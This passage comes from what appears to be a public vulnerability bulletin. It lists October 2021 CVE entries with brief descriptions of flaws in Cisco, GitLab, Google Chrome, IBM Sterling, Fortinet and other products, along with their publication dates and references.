A vulnerability in the web-based management interface of Cisco Orbital could allow an unauthenticated, remote attacker to redirect users to a malicious webpage. This vulnerability is due to improper validation of URL paths in the web-based management interface. An attacker could exploit this vulnerability by persuading a user to click a crafted URL. A successful exploit could allow the attacker to redirect a user to a malicious website. This vulnerability, known as an open redirect attack, is used in phishing attacks to persuade users to visit malicious sites.2021-10-06not yet calculatedCVE-2021-34772
CISCO
cisco -- small_business_220_series_smart_switches
 
Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business 220 Series Smart Switches. An unauthenticated, adjacent attacker could perform the following: Execute code on the affected device or cause it to reload unexpectedly Cause LLDP database corruption on the affected device For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent). Cisco has released firmware updates that address these vulnerabilities.2021-10-06not yet calculatedCVE-2021-34779
CISCO
cisco -- small_business_220_series_smart_switches
 
Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business 220 Series Smart Switches. An unauthenticated, adjacent attacker could perform the following: Execute code on the affected device or cause it to reload unexpectedly Cause LLDP database corruption on the affected device For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent). Cisco has released firmware updates that address these vulnerabilities.2021-10-06not yet calculatedCVE-2021-34780
CISCO
cisco -- small_business_220_series_smart_switches
 
Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business 220 Series Smart Switches. An unauthenticated, adjacent attacker could perform the following: Execute code on the affected device or cause it to reload unexpectedly Cause LLDP database corruption on the affected device For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent). Cisco has released firmware updates that address these vulnerabilities.2021-10-06not yet calculatedCVE-2021-34775
CISCO
cisco -- small_business_220_series_smart_switches
 
Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business 220 Series Smart Switches. An unauthenticated, adjacent attacker could perform the following: Execute code on the affected device or cause it to reload unexpectedly Cause LLDP database corruption on the affected device For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent). Cisco has released firmware updates that address these vulnerabilities.2021-10-06not yet calculatedCVE-2021-34776
CISCO
cisco -- small_business_220_series_smart_switches
 
Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business 220 Series Smart Switches. An unauthenticated, adjacent attacker could perform the following: Execute code on the affected device or cause it to reload unexpectedly Cause LLDP database corruption on the affected device For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent). Cisco has released firmware updates that address these vulnerabilities.2021-10-06not yet calculatedCVE-2021-34777
CISCO
cisco -- small_business_220_series_smart_switches
 
Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business 220 Series Smart Switches. An unauthenticated, adjacent attacker could perform the following: Execute code on the affected device or cause it to reload unexpectedly Cause LLDP database corruption on the affected device For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent). Cisco has released firmware updates that address these vulnerabilities.2021-10-06not yet calculatedCVE-2021-34778
CISCO
cisco -- smart_software_manager_on-prem
 
A vulnerability in the web UI of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an authenticated, remote attacker to elevate privileges and create, read, update, or delete records and settings in multiple functions. This vulnerability is due to insufficient authorization of the System User and System Operator role capabilities. An attacker could exploit this vulnerability by directly accessing a web resource. A successful exploit could allow the attacker to create, read, update, or delete records and settings in multiple functions without the necessary permissions on the web UI.2021-10-06not yet calculatedCVE-2021-34766
CISCO
cisco -- telepresence_collaboration_endpoint_and_roomos_software
 
A vulnerability in the memory management of Cisco TelePresence Collaboration Endpoint (CE) Software and Cisco RoomOS Software could allow an authenticated, local attacker to corrupt a shared memory segment, resulting in a denial of service (DoS) condition. This vulnerability is due to insufficient access controls to a shared memory resource. An attacker could exploit this vulnerability by corrupting a shared memory segment on an affected device. A successful exploit could allow the attacker to cause the device to reload. The device will recover from the corruption upon reboot.2021-10-06not yet calculatedCVE-2021-34758
CISCO
cisco -- vision_dynamic_signage_director
 
A vulnerability in the web-based management interface of Cisco Vision Dynamic Signage Director could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface on an affected device. This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.2021-10-06not yet calculatedCVE-2021-34742
CISCO
cobbler -- cobblerCobbler before 3.3.0 allows arbitrary file write operations via upload_log_data.2021-10-04not yet calculatedCVE-2021-40324
MISC
MISC
cobbler -- cobblerCobbler before 3.3.0 allows authorization bypass for modification of settings.2021-10-04not yet calculatedCVE-2021-40325
MISC
MISC
cobbler -- cobbler
 
Cobbler before 3.3.0 allows log poisoning, and resultant Remote Code Execution, via an XMLRPC method that logs to the logfile for template injection.2021-10-04not yet calculatedCVE-2021-40323
MISC
MISC
concretecms -- concrete5
 
A Server-Side Request Forgery vulnerability was found in concrete5 < 8.5.5 that allowed a decimal notation encoded IP address to bypass the limitations in place for localhost allowing interaction with local services. Impact can vary depending on services exposed.CVSSv2.0 AV:A/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N2021-10-07not yet calculatedCVE-2021-22958
MISC
MISC
containerd -- containerd
 
containerd is an open source container runtime with an emphasis on simplicity, robustness and portability. A bug was found in containerd where container root directories and some plugins had insufficiently restricted permissions, allowing otherwise unprivileged Linux users to traverse directory contents and execute programs. When containers included executable programs with extended permission bits (such as setuid), unprivileged Linux users could discover and execute those programs. When the UID of an unprivileged Linux user on the host collided with the file owner or group inside a container, the unprivileged Linux user on the host could discover, read, and modify those files. This vulnerability has been fixed in containerd 1.4.11 and containerd 1.5.7. Users should update to these version when they are released and may restart containers or update directory permissions to mitigate the vulnerability. Users unable to update should limit access to the host to trusted users. Update directory permission on container bundles directories.2021-10-04not yet calculatedCVE-2021-41103
MISC
CONFIRM
digi -- realport
 
An issue was discovered in Digi RealPort for Windows through 4.8.488.0. A buffer overflow exists in the handling of ADDP discovery response messages. This could result in arbitrary code execution.2021-10-08not yet calculatedCVE-2021-35977
MISC
digi -- realport
 
An issue was discovered in Digi RealPort through 4.8.488.0. The 'encrypted' mode is vulnerable to man-in-the-middle attacks and does not perform authentication.2021-10-08not yet calculatedCVE-2021-35979
MISC
digi -- realport
 
In Digi RealPort through 4.8.488.0, authentication relies on a challenge-response mechanism that gives access to the server password, making the protection ineffective. An attacker may send an unauthenticated request to the server. The server will reply with a weakly-hashed version of the server's access password. The attacker may then crack this hash offline in order to successfully login to the server.2021-10-08not yet calculatedCVE-2021-36767
MISC
django -- unicorn
 
The Unicorn framework through 0.35.3 for Django allows XSS via component.name.2021-10-07not yet calculatedCVE-2021-42053
MISC
MISC
MISC
emlog -- emlog
 
emlog v6.0 contains a vulnerability in the component admin\template.php, which allows attackers to getshell via a crafted Zip file.2021-10-06not yet calculatedCVE-2020-21654
MISC
extensible_service_proxy -- extensible_service_proxy
 
Extensible Service Proxy, a.k.a. ESP is a proxy which enables API management capabilities for JSON/REST or gRPC API services. ESPv1 can be configured to authenticate a JWT token. Its verified JWT claim is passed to the application by HTTP header "X-Endpoint-API-UserInfo", the application can use it to do authorization. But if there are two "X-Endpoint-API-UserInfo" headers from the client, ESPv1 only replaces the first one, the 2nd one will be passed to the application. An attacker can send two "X-Endpoint-API-UserInfo" headers, the second one with a fake JWT claim. Application may use the fake JWT claim to do the authorization. This impacts following ESPv1 usages: 1) Users have configured ESPv1 to do JWT authentication with Google ID Token as described in the referenced google endpoint document. 2) Users backend application is using the info in the "X-Endpoint-API-UserInfo" header to do the authorization. It has been fixed by v1.58.0. You need to patch it in the following ways: * If your docker image is using tag ":1", needs to re-start the container to pick up the new version. The tag ":1" will automatically point to the latest version. * If your docker image tag pings to a specific minor version, e.g. ":1.57". You need to update it to ":1.58" and re-start the container. There are no workaround for this issue.2021-10-07not yet calculatedCVE-2021-41130
MISC
MISC
CONFIRM
MISC
f-secure -- antivirus_engine
 
A vulnerability affecting the F-Secure Antivirus engine was discovered when the engine tries to unpack a zip archive (LZW decompression method), and this can crash the scanning engine. The vulnerability can be exploited remotely by an attacker. A successful attack will result in Denial-of-Service of the Anti-Virus engine.2021-10-06not yet calculatedCVE-2021-33602
MISC
f-secure -- atlant
 
A Denial-of-Service (DoS) vulnerability was discovered in F-Secure Atlant whereby the AVPACK module component used in certain F-Secure products can crash while scanning a fuzzed files. The exploit can be triggered remotely by an attacker. A successful attack will result in Denial-of-Service (DoS) of the Anti-Virus engine.2021-10-08not yet calculatedCVE-2021-33603
MISC
MISC
f-secure -- atlant
 
A Denial-of-Service (DoS) vulnerability was discovered in F-Secure Atlant whereby the AVRDL unpacking module component used in certain F-Secure products can crash while scanning a fuzzed files. The exploit can be triggered remotely by an attacker. A successful attack will result in Denial-of-Service (DoS) of the Anti-Virus engine.2021-10-08not yet calculatedCVE-2021-40832
MISC
MISC
flatpak -- flatpak
 
Flatpak is a system for building, distributing, and running sandboxed desktop applications on Linux. In versions prior to 1.10.4 and 1.12.0, Flatpak apps with direct access to AF_UNIX sockets such as those used by Wayland, Pipewire or pipewire-pulse can trick portals and other host-OS services into treating the Flatpak app as though it was an ordinary, non-sandboxed host-OS process. They can do this by manipulating the VFS using recent mount-related syscalls that are not blocked by Flatpak's denylist seccomp filter, in order to substitute a crafted `/.flatpak-info` or make that file disappear entirely. Flatpak apps that act as clients for AF_UNIX sockets such as those used by Wayland, Pipewire or pipewire-pulse can escalate the privileges that the corresponding services will believe the Flatpak app has. Note that protocols that operate entirely over the D-Bus session bus (user bus), system bus or accessibility bus are not affected by this. This is due to the use of a proxy process `xdg-dbus-proxy`, whose VFS cannot be manipulated by the Flatpak app, when interacting with these buses. Patches exist for versions 1.10.4 and 1.12.0, and as of time of publication, a patch for version 1.8.2 is being planned. There are no workarounds aside from upgrading to a patched version.2021-10-08not yet calculatedCVE-2021-41133
MISC
MISC
MISC
MISC
MISC
MISC
CONFIRM
MISC
MISC
forcepoint -- ngfw_engine
 
Forcepoint NGFW Engine versions 6.5.11 and earlier, 6.8.6 and earlier, and 6.10.0 are vulnerable to TCP reflected amplification vulnerability, if HTTP User Response has been configured.2021-10-04not yet calculatedCVE-2021-41530
MISC
fortiguard -- fortianalyzer
 
An improper neutralization of input vulnerability [CWE-79] in FortiAnalyzer versions 6.4.3 and below, 6.2.7 and below and 6.0.10 and below may allow a remote authenticated attacker to perform a stored cross site scripting attack (XSS) via the column settings of Logview in FortiAnalyzer, should the attacker be able to obtain that POST request, via other, hypothetical attacks.2021-10-06not yet calculatedCVE-2021-24021
CONFIRM
fortiguard -- fortianalyzervm_and_fortimanagervm
 
An information disclosure vulnerability [CWE-200] in FortiAnalyzerVM and FortiManagerVM versions 7.0.0 and 6.4.6 and below may allow an authenticated attacker to read the FortiCloud credentials which were used to activate the trial license in cleartext.2021-10-06not yet calculatedCVE-2021-36170
CONFIRM
fortiguard -- forticlientems
 
A path traversal vulnerability [CWE-22] in FortiClientEMS versions 6.4.1 and below; 6.2.8 and below may allow an authenticated attacker to inject directory traversal character sequences to add/delete the files of the server via the name parameter of Deployment Packages.2021-10-06not yet calculatedCVE-2020-15941
CONFIRM
fortiguard -- forticlientems
 
An insufficient session expiration vulnerability [CWE- 613] in FortiClientEMS versions 6.4.2 and below, 6.2.8 and below may allow an attacker to reuse the unexpired admin user session IDs to gain admin privileges, should the attacker be able to obtain that session ID (via other, hypothetical attacks)2021-10-06not yet calculatedCVE-2021-24019
CONFIRM
fortiguard -- fortinet_fortisdnconnector
 
A insufficiently protected credentials in Fortinet FortiSDNConnector version 1.1.7 and below allows attacker to disclose third-party devices credential information via configuration page lookup.2021-10-06not yet calculatedCVE-2021-36178
CONFIRM
fortiguard -- fortiwebmanager
 
An improper neutralization of input vulnerability [CWE-79] in FortiWebManager versions 6.2.3 and below, 6.0.2 and below may allow a remote authenticated attacker to inject malicious script/tags via the name/description/comments parameter of various sections of the device.2021-10-06not yet calculatedCVE-2021-36175
CONFIRM
gclib -- gffline
 
An out-of-bounds access in GffLine::GffLine in gff.cpp in GCLib 0.12.7 allows an attacker to cause a segmentation fault or possibly have unspecified other impact via a crafted GFF file.2021-10-04not yet calculatedCVE-2021-42006
MISC
gfos_workforce_management -- gfos_workforce_management
 
In GFOS Workforce Management 4.8.272.1, the login page of application is prone to authentication bypass, allowing anyone (who knows a user's credentials except the password) to get access to an account. This occurs because of JSESSIONID mismanagement.2021-10-04not yet calculatedCVE-2021-38618
MISC
gila_cms -- gila_cms
 
A Stored XSS via Malicious File Upload exists in Gila CMS version 2.2.0. An attacker can use this to steal cookies, passwords or to run arbitrary code on a victim's browser.2021-10-04not yet calculatedCVE-2021-39486
MISC
gila_cms -- gila_cms
 
Gila CMS 2.2.0 is vulnerable to Insecure Direct Object Reference (IDOR). Thumbnails uploaded by one site owner are visible by another site owner just by knowing the other site name and fuzzing for picture names. This leads to sensitive information disclosure.2021-10-04not yet calculatedCVE-2021-37777
MISC
gitlab -- gitlabA vulnerability was discovered in GitLab starting with version 12.2 that allows an attacker to cause uncontrolled resource consumption with a specially crafted file.2021-10-04not yet calculatedCVE-2021-39877
MISC
MISC
CONFIRM
gitlab -- gitlabA stored Reflected Cross-Site Scripting vulnerability in the Jira integration in GitLab version 13.0 up to 14.3.1 allowed an attacker to execute arbitrary javascript code.2021-10-05not yet calculatedCVE-2021-39878
MISC
MISC
CONFIRM
gitlab -- gitlab
 
Information disclosure from SendEntry in GitLab starting with 10.8 allowed exposure of full URL of artifacts stored in object-storage with a temporary availability via Rails logs.2021-10-04not yet calculatedCVE-2021-39900
MISC
CONFIRM
gitlab -- gitlab
 
A business logic error in the project deletion process in GitLab 13.6 and later allows persistent access via project access tokens.2021-10-05not yet calculatedCVE-2021-39866
CONFIRM
MISC
MISC
gitlab -- gitlab_cc/eeIn all versions of GitLab CE/EE since version 11.0, the requirement to enforce 2FA is not honored when using git commands.2021-10-04not yet calculatedCVE-2021-39874
MISC
MISC
CONFIRM
gitlab -- gitlab_ce/eeIn all versions of GitLab CE/EE since version 13.0, an instance that has the setting to disable Bitbucket Server import enabled is bypassed by an attacker making a crafted API call.2021-10-04not yet calculatedCVE-2021-39871
CONFIRM
MISC
MISC
gitlab -- gitlab_ce/eeIn all versions of GitLab CE/EE since version 14.1, an improper access control vulnerability allows users with expired password to still access GitLab through git and API through access tokens acquired before password expiration.2021-10-05not yet calculatedCVE-2021-39872
CONFIRM
MISC
MISC
gitlab -- gitlab_ce/eeIn all versions of GitLab CE/EE, there exists a content spoofing vulnerability which may be leveraged by attackers to trick users into visiting a malicious website by spoofing the content in an error response.2021-10-04not yet calculatedCVE-2021-39873
MISC
MISC
CONFIRM
gitlab -- gitlab_ce/eeIn all versions of GitLab CE/EE since version 8.12, an authenticated low-privileged malicious user may create a project with unlimited repository size by modifying values in a project export.2021-10-04not yet calculatedCVE-2021-39868
MISC
CONFIRM
MISC
gitlab -- gitlab_ce/eeIn all versions of GitLab CE/EE since version 8.9, project exports may expose trigger tokens configured on that project.2021-10-05not yet calculatedCVE-2021-39869
MISC
MISC
CONFIRM
gitlab -- gitlab_ce/eeIn all versions of GitLab CE/EE since version 8.0, a DNS rebinding vulnerability exists in Fogbugz importer which may be used by attackers to exploit Server Side Request Forgery attacks.2021-10-05not yet calculatedCVE-2021-39894
MISC
CONFIRM
gitlab -- gitlab_ce/ee
 
In all versions of GitLab CE/EE since version 8.0, when an admin uses the impersonate feature twice and stops impersonating, the admin may be logged in as the second user they impersonated, which may lead to repudiation issues.2021-10-04not yet calculatedCVE-2021-39896
CONFIRM
MISC
gitlab -- gitlab_ce/ee
 
In all versions of GitLab CE/EE since version 13.6, it is possible to see pending invitations of any public group or public project by visiting an API endpoint.2021-10-05not yet calculatedCVE-2021-39875
CONFIRM
MISC
MISC
gitlab -- gitlab_ce/ee
 
Missing authentication in all versions of GitLab CE/EE since version 7.11.0 allows an attacker with access to a victim's session to disable two-factor authentication2021-10-04not yet calculatedCVE-2021-39879
CONFIRM
MISC
gitlab -- gitlab_ce/ee
 
In all versions of GitLab CE/EE since version 8.15, a DNS rebinding vulnerability in Gitea Importer may be exploited by an attacker to trigger Server Side Request Forgery (SSRF) attacks.2021-10-05not yet calculatedCVE-2021-39867
CONFIRM
MISC
gitlab -- gitlab_ce/ee
 
In all versions of GitLab CE/EE, provided a user ID, anonymous users can use a few endpoints to retrieve information about any GitLab user.2021-10-05not yet calculatedCVE-2021-39882
MISC
CONFIRM
gitlab -- gitlab_ce/ee
 
In all versions of GitLab CE/EE, an attacker with physical access to a user’s machine may brute force the user’s password via the change password function. There is a rate limit in place, but the attack may still be conducted by stealing the session id from the physical compromise of the account and splitting the attack over several IP addresses and passing in the compromised session value from these various locations.2021-10-04not yet calculatedCVE-2021-39899
CONFIRM
MISC
gitlab -- gitlab_eeIn all versions of GitLab EE since version 13.10, a specific API endpoint may reveal details about a private group and other sensitive info inside issue and merge request templates.2021-10-05not yet calculatedCVE-2021-39888
MISC
CONFIRM
MISC
gitlab -- gitlab_ee
 
A Stored XSS in merge request creation page in Gitlab EE version 13.5 and above allows an attacker to execute arbitrary JavaScript code on the victim's behalf via malicious approval rule names2021-10-04not yet calculatedCVE-2021-39885
MISC
CONFIRM
MISC
gitlab -- gitlab_ee
 
In all versions of GitLab EE since version 8.13, an endpoint discloses names of private groups that have access to a project to low privileged users that are part of that project.2021-10-05not yet calculatedCVE-2021-39884
MISC
CONFIRM
MISC
gitlab -- gitlab_ee
 
Improper authorization checks in GitLab EE > 13.11 allows subgroup members to see epics from all parent subgroups.2021-10-04not yet calculatedCVE-2021-39883
CONFIRM
MISC
google -- chromeUse after free in Performance Manager in Google Chrome prior to 94.0.4606.54 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37962
MISC
MISC
FEDORA
google -- chromeUse after free in Tab Strip in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37961
MISC
MISC
FEDORA
google -- chromeSide-channel information leakage in DevTools in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to bypass site isolation via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37963
MISC
MISC
FEDORA
google -- chromeInappropriate implementation in ChromeOS Networking in Google Chrome on ChromeOS prior to 94.0.4606.54 allowed an attacker with a rogue wireless access point to to potentially carryout a wifi impersonation attack via a crafted ONC file.2021-10-08not yet calculatedCVE-2021-37964
MISC
MISC
FEDORA
google -- chromeInappropriate implementation in Background Fetch API in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to leak cross-origin data via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37965
MISC
MISC
FEDORA
google -- chromeInappropriate implementation in Compositing in Google Chrome on Android prior to 94.0.4606.54 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37966
MISC
MISC
FEDORA
google -- chromeInappropriate implementation in Navigation in Google Chrome on Windows prior to 94.0.4606.54 allowed a remote attacker to inject scripts or HTML into a privileged page via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37958
MISC
MISC
FEDORA
google -- chromeInappropriate implementation in Background Fetch API in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to leak cross-origin data via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37968
MISC
MISC
FEDORA
google -- chromeInappropriate implementation in Google Updater in Google Chrome on Windows prior to 94.0.4606.54 allowed a remote attacker to perform local privilege escalation via a crafted file.2021-10-08not yet calculatedCVE-2021-37969
MISC
MISC
FEDORA
google -- chromeUse after free in File System API in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37970
MISC
MISC
FEDORA
google -- chromeIncorrect security UI in Web Browser UI in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37971
MISC
MISC
FEDORA
google -- chromeUse after free in WebGPU in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37957
MISC
MISC
FEDORA
google -- chromeUse after free in Task Manager in Google Chrome prior to 94.0.4606.54 allowed an attacker who convinced a user to enage in a series of user gestures to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37959
MISC
MISC
FEDORA
google -- chromeInappropriate implementation in Background Fetch API in Google Chrome prior to 94.0.4606.54 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37967
MISC
MISC
FEDORA
google -- chromeUse after free in V8 in Google Chrome prior to 94.0.4606.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37975
MISC
MISC
google -- chromeInappropriate implementation in Memory in Google Chrome prior to 94.0.4606.71 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37976
MISC
MISC
google -- chromeUse after free in Safebrowsing in Google Chrome prior to 94.0.4606.71 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37974
MISC
MISC
google -- chromeUse after free in Portals in Google Chrome prior to 94.0.4606.61 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37973
MISC
MISC
FEDORA
google -- chromeOut of bounds read in libjpeg-turbo in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37972
MISC
MISC
FEDORA
FEDORA
google -- chrome
 
Use after free in Offline use in Google Chrome on Android prior to 94.0.4606.54 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37956
MISC
MISC
FEDORA
google -- chrome
 
Use after free in Indexed DB API in Google Chrome prior to 93.0.4577.82 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-30633
MISC
MISC
FEDORA
google -- chrome
 
Out of bounds memory access in ANGLE in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-30626
MISC
MISC
FEDORA
google -- chrome
 
Use after free in Selection API in Google Chrome prior to 93.0.4577.82 allowed a remote attacker who convinced the user the visit a malicious website to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-30625
MISC
MISC
FEDORA
google -- chrome
 
Type confusion in Blink layout in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-30627
MISC
MISC
FEDORA
google -- chrome
 
Stack buffer overflow in ANGLE in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to potentially exploit stack corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-30628
MISC
MISC
FEDORA
google -- chrome
 
Use after free in Permissions in Google Chrome prior to 93.0.4577.82 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-30629
MISC
MISC
FEDORA
google -- chrome
 
Inappropriate implementation in Blink in Google Chrome prior to 93.0.4577.82 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-30630
MISC
MISC
FEDORA
google -- chrome
 
Out of bounds write in V8 in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-30632
MISC
MISC
FEDORA
google -- slo_generator
 
SLO generator allows for loading of YAML files that if crafted in a specific format can allow for code execution within the context of the SLO Generator. We recommend upgrading SLO Generator past https://github.com/google/slo-generator/pull/1732021-10-04not yet calculatedCVE-2021-22557
CONFIRM
MISC
hashicorp -- nomad_and_nomad_enterpriseHashiCorp Nomad and Nomad Enterprise 1.1.1 through 1.1.5 allowed authenticated users with job submission capabilities to cause denial of service by submitting incomplete job specifications with a Consul mesh gateway and host networking mode. Fixed in 1.1.6.2021-10-07not yet calculatedCVE-2021-41865
MISC
hashicorp -- vault_and_vault_enterprise
 
HashiCorp Vault and Vault Enterprise through 1.7.4 and 1.8.3 allowed a user with write permission to an entity alias ID sharing a mount accessor with another user to acquire this other user’s policies by merging their identities. Fixed in Vault and Vault Enterprise 1.7.5 and 1.8.4.2021-10-08not yet calculatedCVE-2021-41802
MISC
hongcms -- hongcms
 
HongCMS v3.0 contains an arbitrary file read and write vulnerability in the component /admin/index.php/template/edit.2021-10-04not yet calculatedCVE-2020-21431
MISC
hygeia -- hygeia
 
Hygeia is an application for collecting and processing personal and case data in connection with communicable diseases. In affected versions all CSV Exports (Statistics & BAG MED) contain a CSV Injection Vulnerability. Users of the system are able to submit formula as exported fields which then get executed upon ingestion of the exported file. There is no validation or sanitization of these formula fields and so malicious may construct malicious code. This vulnerability has been resolved in version 1.30.4. There are no workarounds and all users are advised to upgrade their package.2021-10-06not yet calculatedCVE-2021-41128
MISC
MISC
MISC
CONFIRM
MISC
ibm -- app_connect_enterprise_certified_container
 
IBM App Connect Enterprise Certified Container 1.0, 1.1, 1.2, 1.3, 1.4 and 1.5 could disclose sensitive information to a local user when it is configured to use an IBM Cloud API key to connect to cloud-based connectors. IBM X-Force ID: 207630.2021-10-08not yet calculatedCVE-2021-29906
CONFIRM
XF
ibm -- sterling_b2b_integrator
 
IBM Sterling B2B Integrator 5.2.0.0 through 6.1.1.0 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 199246.2021-10-07not yet calculatedCVE-2021-20571
XF
CONFIRM
ibm -- sterling_b2b_integrator_standard_edition
 
IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.1.1.0 could allow an authneticated attacker to obtain sensitive information from configuration files that could aid in further attacks against the system. IBM X-Force ID: 200656.2021-10-07not yet calculatedCVE-2021-29700
CONFIRM
XF
ibm -- sterling_b2b_integrator_standard_edition
 
IBM Sterling B2B Integrator Standard Edition 5.2.0. 0 through 6.1.1.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 210171.2021-10-06not yet calculatedCVE-2021-38925
CONFIRM
XF
ibm -- sterling_b2b_integrator_standard_edition
 
IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.1.1.0 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 203734.2021-10-06not yet calculatedCVE-2021-29798
CONFIRM
XF
ibm -- sterling_b2b_integrator_standard_edition
 
IBM Sterling B2B Integrator Standard Edition 5.2.0.0. through 6.1.1.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204912.2021-10-06not yet calculatedCVE-2021-29836
CONFIRM
XF
ibm -- sterling_b2b_integrator_standard_edition
 
IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.1.1.0 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 204913.2021-10-06not yet calculatedCVE-2021-29837
XF
CONFIRM
ibm -- sterling_b2b_integrator_standard_edition
 
IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.1.1.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 205684.2021-10-06not yet calculatedCVE-2021-29855
XF
CONFIRM
ibm -- sterling_b2b_integrator_standard_edition
 
IBM Sterling B2B Integrator Standard Edition 5.2.6.0 through 6.1.1.0 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 207506.2021-10-06not yet calculatedCVE-2021-29903
CONFIRM
XF
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2.0.0 through 6.1.1.0 could allow an authenticated user to intercept and replace a message sent by another user due to improper access controls. IBM X-Force ID: 195567.2021-10-07not yet calculatedCVE-2021-20375
CONFIRM
XF
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2.0.0 through 6.1.1.0 could allow an authenticated user to obtain sensitive information due to improper permission control. IBM X-Force ID: 186090.2021-10-08not yet calculatedCVE-2020-4654
CONFIRM
XF
ibm -- sterling_file_gateway
 
